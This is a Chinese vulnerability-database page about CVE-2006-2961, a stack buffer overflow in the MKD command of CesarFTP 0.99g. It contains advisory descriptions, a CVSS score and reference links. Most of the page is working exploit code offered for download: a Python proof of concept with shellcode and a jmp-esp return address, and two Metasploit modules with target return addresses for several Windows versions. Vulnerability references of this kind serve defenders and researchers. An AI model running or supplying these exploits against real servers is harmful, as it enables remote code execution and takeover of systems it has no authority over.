CVE-2006-2961
CVSS7.5
发布时间 :2006-06-12 16:06:00
修订时间 :2011-03-07 21:37:23
NMCOEPS    

[原文]Stack-based buffer overflow in CesarFTP 0.99g and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long MKD command. NOTE: the provenance of this information is unknown; the details are obtained from third party information.


[CNNVD]ACLogic CesarFTP 多个命令畸形参数 远程缓冲区溢出漏洞(CNNVD-200606-240)

        CasesarFTP是ACLogic公司发布的Windows平台下的FTP服务器。
        CasesarFTP在处理MKD等命令的参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。
        通过给受影响的FTP命令发送超长的字符串作为参数,会导致CasesarFTP发生堆溢出。利用这个漏洞,攻击者可以获得目标主机的"SYSTEM"权限或者以"SYSTEM"权限执行任意代指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2961
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2961
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-240
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27071
(UNKNOWN)  XF  cesarftp-mkd-bo(27071)
http://www.vupen.com/english/advisories/2006/2287
(UNKNOWN)  VUPEN  ADV-2006-2287
http://www.securityfocus.com/bid/18586
(UNKNOWN)  BID  18586
http://www.osvdb.org/26364
(UNKNOWN)  OSVDB  26364
http://secunia.com/advisories/20574
(VENDOR_ADVISORY)  SECUNIA  20574

- 漏洞信息

ACLogic CesarFTP 多个命令畸形参数 远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-12 00:00:00 2006-10-30 00:00:00
远程  
        CasesarFTP是ACLogic公司发布的Windows平台下的FTP服务器。
        CasesarFTP在处理MKD等命令的参数时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户机器。
        通过给受影响的FTP命令发送超长的字符串作为参数,会导致CasesarFTP发生堆溢出。利用这个漏洞,攻击者可以获得目标主机的"SYSTEM"权限或者以"SYSTEM"权限执行任意代指令。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.aclogic.com/

- 漏洞信息 (1906)

CesarFTP 0.99g (MKD) Remote Buffer Overflow Exploit (EDBID:1906)
windows remote
2006-06-12 Verified
0 h07
[点击下载] [点击下载]
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07@interia.pl]
#Date: 10.06.2006

from socket import *

shellcode = ( #execute calc.exe <metasploit.com>
"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4")

def intel_order(i):
    a = chr(i % 256)
    i = i >> 8
    b = chr(i % 256)
    i = i >> 8
    c = chr(i % 256)
    i = i >> 8
    d = chr(i % 256)
    str = "%c%c%c%c" % (a, b, c, d)
    return str

host = "127.0.0.1"
port = 21
user = "h07"
password = "open"
EIP = 0x7CA58265 #jmp esp <shell32.dll XP sp2 polish>

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("user %s\r\n" % (user))
print s.recv(1024)

s.send("pass %s\r\n" % (password))
print s.recv(1024)

buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"

print "len: %d" % (len(buffer))

s.send(buffer)
print s.recv(1024)

s.close()

#EoF 

# milw0rm.com [2006-06-12]
		

- 漏洞信息 (16713)

Cesar FTP 0.99g MKD Command Buffer Overflow (EDBID:16713)
windows remote
2011-02-23 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: cesarftp_mkd.rb 11799 2011-02-23 00:58:54Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.

				You must have valid credentials to trigger this vulnerability. Also, you
				only get one chance, so choose your target carefully.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11799 $',
			'References'     =>
				[
					[ 'CVE', '2006-2961'],
					[ 'OSVDB', '26364'],
					[ 'BID', '18586'],
					[ 'URL', 'http://secunia.com/advisories/20574/' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
					'Compat'        =>
						{
							'SymbolLookup' => 'ws2ord',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
					[ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
					#[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll
					#[ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll
					[ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
				],
			'DisclosureDate' => 'Jun 12 2006',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /CesarFTP 0\.99g/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		sploit =  "\n" * 671 + rand_text_english(3, payload_badchars)
		sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded

		print_status("Trying target #{target.name}...")

		send_cmd( ['MKD', sploit] , false)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83077)

Cesar FTP 0.99g MKD Command Buffer Overflow (PacketStormID:F83077)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-2961
[点击下载]

This Metasploit module exploits a stack overflow in the MKD verb in CesarFTP 0.99g.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2961'],
					[ 'OSVDB', '26364'],
					[ 'BID', '18586'],
					[ 'URL', 'http://secunia.com/advisories/20574/' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows 2000 Pro SP4 French',  { 'Ret' => 0x775F29D0 } ],
					[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ],
					[ 'Windows 2003 SP1 English',     { 'Ret' => 0x76AA679b } ],
				],
			'DisclosureDate' => 'Jun 12 2006',
			'DefaultTarget'  => 0))
	end

	def check
		connect
		disconnect	
	
		if (banner =~ /CesarFTP 0\.99g/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect_login

		sploit =  "\n" * 671 + rand_text_english(3, payload_badchars)  
		sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded  

		print_status("Trying target #{target.name}...")

		send_cmd( ['MKD', sploit] , false)

		handler
		disconnect
	end

end
    

- 漏洞信息

26364
CesarFTP MKD Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in CesarFTP. CesarFTP fails to handle an improper MKD command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2006-06-11 Unknow
2006-06-11 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

ACLogic CesarFTP Multiple Commands Remote Buffer Overflow Vulnerability
Boundary Condition Error 18586
Yes No
2006-06-12 12:00:00 2008-12-31 03:11:00
Discovery is credited to h07.

- 受影响的程序版本

ACLogic CesarFTP 0.99 g

- 漏洞讨论

CesarFTP is prone to a buffer-overflow vulnerability when handling data through the MKD command.
Reportedly, passing excessive data may overflow a finite-sized internal memory buffer. A successful attack may result in memory corruption as memory adjacent to the buffer is overwritten with user-supplied data.

This issue may lead to a denial-of-service condition or to the execution of arbitrary code.

CesarFTP 0.99g is vulnerable; other versions may also be affected.

- 漏洞利用

A Metasploit framework exploit module is available.

The following exploit code is available for members of the Immunity Partners program:
https://www.immunityinc.com/downloads/immpartners/cesarftp.tar

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站